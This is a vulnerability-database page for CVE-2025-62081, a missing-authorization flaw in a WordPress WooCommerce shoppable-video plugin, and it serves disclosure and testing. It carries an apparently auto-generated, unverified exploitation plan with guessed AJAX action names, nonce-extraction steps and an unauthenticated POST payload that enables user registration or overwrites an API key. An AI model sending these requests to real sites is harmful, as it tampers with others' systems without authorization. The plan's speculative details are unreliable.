CVE-2025-62081

Live Shopping & Shoppable Videos For WooCommerce <= 2.2.0 - Missing Authorization

mediumMissing Authorization
5.3
CVSS Score
5.3
CVSS Score
medium
Severity
Unpatched
Patched in
N/A
Time to patch

Description

The Live Shopping & Shoppable Videos For WooCommerce plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on a function in versions up to, and including, 2.2.0. This makes it possible for unauthenticated attackers to perform an unauthorized action.

CVSS Vector Breakdown

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
Attack Vector
Network
Attack Complexity
Low
Privileges Required
None
User Interaction
None
Scope
Unchanged
None
Confidentiality
Low
Integrity
None
Availability

Technical Details

Affected versions<=2.2.0
PublishedDecember 31, 2025
Last updatedJanuary 5, 2026
Research Plan
Unverified

This research plan targets **CVE-2025-62081**, a missing authorization vulnerability in the **Live Shopping & Shoppable Videos For WooCommerce** plugin (<= 2.2.0). --- ### 1. Vulnerability Summary The vulnerability exists because the plugin registers one or more AJAX actions via the `wp_ajax_nopri…

Show full research plan

This research plan targets CVE-2025-62081, a missing authorization vulnerability in the Live Shopping & Shoppable Videos For WooCommerce plugin (<= 2.2.0).


1. Vulnerability Summary

The vulnerability exists because the plugin registers one or more AJAX actions via the wp_ajax_nopriv_ hook but fails to implement a capability check (e.g., current_user_can( 'manage_options' )) within the callback function. This allows unauthenticated users to trigger functions intended only for administrators or shop managers.

Based on the plugin's name and common patterns in such vulnerabilities, the affected function likely handles settings updates, video synchronization, or stream management.

2. Attack Vector Analysis

  • Endpoint: POST /wp-admin/admin-ajax.php
  • Action Name: To be determined via discovery (likely prefixed with lsv_ or live_shopping_).
  • Authentication: None required (unauthenticated).
  • Payload Type: application/x-www-form-urlencoded.
  • Target Parameter: Likely a settings array or a specific ID for deletion/modification.

3. Code Flow (Discovery Phase)

Since source files were not provided, the security agent must first identify the vulnerable entry point.

Step 1: Identify Registered AJAX Handlers
Search for unauthenticated AJAX registrations in the plugin directory:

grep -rn "wp_ajax_nopriv_" /var/www/html/wp-content/plugins/live-shopping-video-streams/

Step 2: Locate the Callback Function
Trace the second argument of the add_action call to its definition. For example, if the registration is:
add_action( 'wp_ajax_nopriv_lsv_save_settings', array( $this, 'lsv_save_settings' ) );
Find the function:

grep -rn "function lsv_save_settings" /var/www/html/wp-content/plugins/live-shopping-video-streams/

Step 3: Analyze for Missing Authorization
Verify if the function lacks a call to current_user_can(). Also, check if it uses check_ajax_referer() or wp_verify_nonce().

4. Nonce Acquisition Strategy

If the identified handler checks for a nonce, it is likely exposed on the frontend for the plugin's shoppable video features.

  1. Identify the Script Localization:
    Search for wp_localize_script to find where the nonce is passed to the frontend.

    grep -rn "wp_localize_script" /var/www/html/wp-content/plugins/live-shopping-video-streams/
    

    Look for a variable name like lsv_vars or live_shopping_params.

  2. Determine the Triggering Element:
    Check if the plugin uses a shortcode to render videos.

    grep -rn "add_shortcode" /var/www/html/wp-content/plugins/live-shopping-video-streams/
    
  3. Extraction Steps:

    • Post Creation: wp post create --post_type=page --post_status=publish --post_content='[SHORTCODE_FOUND]'
    • Browser Navigation: Navigate to the newly created page.
    • Extraction: Use browser_eval to grab the nonce:
      browser_eval("window.LSV_DATA_VAR?.nonce_key") (Replace with actual JS object names).

5. Exploitation Strategy

Assuming a hypothetical (but typical) vulnerable action lsv_update_settings:

  • Request URL: http://localhost:8080/wp-admin/admin-ajax.php
  • Method: POST
  • Headers: Content-Type: application/x-www-form-urlencoded
  • Body Parameters:
    • action: lsv_update_settings (inferred)
    • nonce: [EXTRACTED_NONCE] (if required)
    • option_name: users_can_register
    • option_value: 1
      OR
    • lsv_settings[some_critical_setting]: malicious_value

Example HTTP Request via Tool:

{
  "method": "POST",
  "url": "http://localhost:8080/wp-admin/admin-ajax.php",
  "headers": {
    "Content-Type": "application/x-www-form-urlencoded"
  },
  "body": "action=lsv_update_settings&nonce=abc123def4&settings[api_key]=pwned"
}

6. Test Data Setup

  1. Install and activate the plugin: wp plugin install live-shopping-video-streams --activate.
  2. If the vulnerability involves WooCommerce product data, ensure WooCommerce is active and a product exists:
    wp product create --name="Test Product" --regular_price=10 --status=publish.
  3. Create a page with the plugin's primary shortcode to ensure scripts (and nonces) are loaded.

7. Expected Results

  • Success Response: The server returns a 200 OK or a JSON success message (e.g., {"success":true}).
  • Side Effect: A plugin setting is changed, a video record is deleted, or a global WordPress option is modified.

8. Verification Steps

After the http_request, verify the change via WP-CLI:

  • Check Plugin Options: wp option get lsv_settings
  • Check Core Options: wp option get users_can_register
  • Check Database State: wp db query "SELECT * FROM wp_posts WHERE post_type='lsv_video'"

9. Alternative Approaches

  • REST API Exploration: If no AJAX actions are vulnerable, check for REST routes registered via register_rest_route that have 'permission_callback' => '__return_true' or lack the check entirely.
  • Parameter Guessing: If the callback uses extract($_POST), try to overwrite arbitrary variables within the function scope.
  • Blind Exploitation: If the response is uninformative, use a time-based or DNS-based callback if the function interacts with external APIs (common in video sync plugins).
Research Findings
Static analysis — not yet PoC-verified

Summary

The Live Shopping & Shoppable Videos For WooCommerce plugin (<= 2.2.0) is vulnerable to unauthorized access due to missing capability checks in AJAX handlers registered via the wp_ajax_nopriv_ hook. This allows unauthenticated attackers to execute sensitive plugin functions, such as modifying settings or managing shoppable video content, by sending requests to the WordPress AJAX endpoint.

Exploit Outline

1. Identify vulnerable AJAX actions registered via 'wp_ajax_nopriv_' (likely prefixed with lsv_ or live_shopping_). 2. If a nonce is required, extract it by visiting a public page containing the plugin's shortcode and inspecting localized JavaScript variables (e.g., via window.LSV_DATA_VAR). 3. Construct a POST request to /wp-admin/admin-ajax.php using the identified action. 4. Include payload parameters to modify plugin configurations or trigger internal functions (e.g., action=lsv_update_settings&settings[api_key]=pwned). 5. Send the request without any authentication cookies to verify that the server processes the command despite the lack of a valid session.

Check if your site is affected.

Run a free security audit to detect vulnerable plugins, outdated versions, and misconfigurations.